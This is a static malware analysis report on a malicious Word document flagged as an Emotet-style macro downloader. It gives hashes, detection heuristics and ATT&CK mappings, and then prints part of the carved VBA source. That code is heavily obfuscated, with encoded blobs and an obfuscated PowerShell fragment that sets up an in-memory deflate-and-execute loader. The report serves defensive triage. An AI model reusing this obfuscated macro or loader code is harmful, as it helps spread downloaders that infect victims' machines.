Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca2e97bc56ff245b…

MALICIOUS

Office (OLE)

154.8 KB First seen: 2019-01-20
MD5: db3a8b4ca84d67d92f189b4ce6a38ac8 SHA-1: f07be693819749e84a9abd587717789243954743 SHA-256: ca2e97bc56ff245bc99d327bcf169d8edf1ee160b6fe93ff3f70450832b484a7
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic auto-exec markers and a high-confidence firing for VBA macros with CreateObject and execution tokens, indicating malicious intent. The presence of the 'macros.bas' artifact and ClamAV detection as 'Doc.Malware.Emodldr-10025032-0' strongly suggests a downloader or droppper functionality. The VBA script, though heavily obfuscated, likely attempts to download and execute a second-stage payload, aligning with the typical behavior of Emodldr variants.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38954 bytes
SHA-256: a7b145ff5e81132a0b53dee53f3724905e5687853960364ffdbe15ca46997d46
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QEfRDPmlhzlop"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HIOMGrCVpC"
Function AHDWkTmlcDCFuF()
On Error Resume Next
ScFarZ = 7873 * 77767
ShqMEU = (76869 + CDate(29238 / Atn(ifjDW)) / 30877 * ORDpCn * 40631 * CInt(bdzija) * rATKtA / CSng(zfRjV))
nvPFp = Tan(78844)
itMLaw = MQPQhE("XX6kXixpn3aaYSDsJfitkWeUVe2j3hHnPCyH9g/M+tLq1fP/KEOWWdlSz/Rj4z7mPllnRE/C9Zf2s8+WAgHC+UvCn/AF8TPlrgfLY/Ae56zqpkP4r23Pjvfg3HI/LAVXgKnS4uT4WBgftDP7A/UOfMdOxyIQX0FfvGKF3gJ69M9J8yv2SvnYXajNmM", 2, 177)
HAzhfL = 17493 * 71399
UFijzn = (66817 + CDate(69432 / Atn(WkvSY)) / 44794 * RNufO * 89342 * CInt(rwdqAl) * hrhYLM / CSng(pJzMit))
Ehpcc = Tan(23212)
PmjbL = 30630 * 42747
snCow = (51790 + CDate(91509 / Atn(zHkjnJ)) / 80159 * MNDlIU * 42808 * CInt(zYwhL) * FYPhbw / CSng(kqcZoj))
nhRFw = Tan(4288)
SlHIJzUdAJt = MQPQhE("aa4K/6KdcdX7VkXqZ6I36MOd6kTTuLLEXGAmRzbj", 2, 34)
wMkFX = 33636 * 90415
XiOjLC = (23495 + CDate(33429 / Atn(irFbX)) / 52150 * UlVTR * 12873 * CInt(kJYGMi) * DhjvSw / CSng(HXwbQ))
XFwob = Tan(71106)
QVcdV = 30870 * 47053
cjqaJ = (36786 + CDate(65877 / Atn(rLVCf)) / 87452 * ajlEvt * 57458 * CInt(CBSsC) * vDTzIq / CSng(TcHEz))
WNwFX = Tan(44183)
IUKMMkTLofz = MQPQhE("BGDKb9y7vfgpu4Twt3104f3Cy4hzDducK7VZj+194/uOnv7lN038J06IrC3QT3q/vUurJ1Izdb23PgZrVbOXs2blVPH908pv32feG8c308sS7YuombFy75sbP3af+rmy/t/djeRzt/Huz7k9n3Ie2be1eF9H22TO/NjkvreM0j4H", 5, 163)
CwjLdU = 96552 * 24832
ZqbjVv = (15248 + CDate(5587 / Atn(XDRGD)) / 58730 * vXHJDw * 90955 * CInt(OuzUH) * osCjD / CSng(dTAaF))
AATVvs = Tan(9593)
iasza = 99013 * 4368
Ifismd = (28640 + CDate(47085 / Atn(iSrzU)) / 87165 * Tduot * 97848 * CInt(YzqqR) * siZHNS / CSng(VMlza))
zOZSQJ = Tan(63162)
TKBzrp = MQPQhE("MYpbf+6fNuijXuX23urG8F2f/HHmHusHbc0+coX5gnGrqFeZ5ovsPkbdW+hQ6o2B9Wd0H6ZnMM4H9kPGT/Gx8Sn736iPy3lK4EzpdQn2cdWZjdo7EA7MbdM+F7hNUv17+FYp/0ekB9nekjqFeBHi", 5, 141)
izENs = 18391 * 22733
swnza = (21079 + CDate(8782 / Atn(jmBrzG)) / 84331 * OuBFzh * 50051 * CInt(kaOjUu) * JpPUp / CSng(dZmJj))
iHpXYF = Tan(18123)
cTvaJL = 7224 * 67622
IQEYk = (63913 + CDate(85669 / Atn(YUvtZ)) / 2248 * iquBRY * 39937 * CInt(IUwui) * BbJrX / CSng(jCWcL))
huHhp = Tan(6244)
ESJrP = MQPQhE("mj0x5Xqqko6mbIn/vmQN3+5pvJ+LhVnw56fyADuIclfkK8SSOq9/Jk+96f/Wuq++fN88qANFDs%", 3, 66)
SrTRC = 34259 * 71304
FvEmmJ = (83891 + CDate(44643 / Atn(mCBtwj)) / 37283 * pOraD * 51679 * CInt(vcQaiK) * ZmTbG / CSng(qZspW))
umBYV = Tan(21373)
zWdWKR = 65856 * 15052
uijlw = (78148 + CDate(1877 / Atn(OwMBKA)) / 43359 * GcCOjF * 93992 * CInt(wzKOmA) * wpADX / CSng(npSVU))
rvapVG = Tan(90924)
naiZX = MQPQhE("5bjv+eomz36DHXqWV/WT4gjcAZ9zPhF2XNd3qrAe8SgPkMdIf9b4pE9g+rGMR7mX2vxiuxsjZWN", 4, 67)
pfsXo = 63836 * 84538
zdmLOZ = (25928 + CDate(22651 / Atn(wwDSm)) / 70529 * MZFwWH * 79184 * CInt(rviTw) * Oqfwqo / CSng(JRShOj))
IrmCu = Tan(99865)
wGMJLa = 14640 * 52387
wjraa = (13136 + CDate(15134 / Atn(YCVhbW)) / 42347 * QShkIG * 58963 * CInt(HCjwwi) * Dpwhn / CSng(kuLHo))
mRQUj = Tan(82224)
QRBnOY = MQPQhE("HQ3HDm/I++GIhPG/EE+6rledleofl", 7, 20)
uHZqR = 85887 * 3578
TYXLw = (89308 + CDate(91352 / Atn(sdpiX)) / 62475 * WdTls * 26196 * CInt(hAFckz) * wholGQ / CSng(ovsaq))
XqtIzN = Tan(67799)
rDvGD = 79683 * 92797
mzYiF = (14319 + CDate(28106 / Atn(TYfjBi)) / 68858 * NwWiap * 44821 * CInt(KDnSA) * jTCCU / CSng(PzIAzj))
kvpPJ = Tan(37314)
hmFWa = MQPQhE("H&( ([sTring]$veRbosEPRefEREnCE)[1,3]+'x'-JoIN'') (&('nE'+'w'+'-obJecT')  ('I'+'o.sTREAmRe'+'ADer')(( &('nE'+'w-obJec'+'T')  ('io.Co'+'MPRES'+'s'+'iON.'+'DEF'+'LA'+'TEsT'+'re'+'aM')([io.mEMorGnfIl,", 2, 190)
tHTNm = 95695 * 53639
YCUwl = (34688 + CDate(84259 / Atn(dwNuM)) / 30601 * Wlunmb * 40986 * CInt(iwhIYA) * QXNOZG / CSng(BvjskL))
vYGdT = Tan(93527)
AjIcTS = 74396 * 79974
hUsTzX = (63784 + CDate(10345 / Atn(FiDijP)) / 92261 * RwZbj * 95568 * CInt(wFKji) * QGzdpH / CSng(tJDbYj))
olRAs = Tan(63419)
U
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.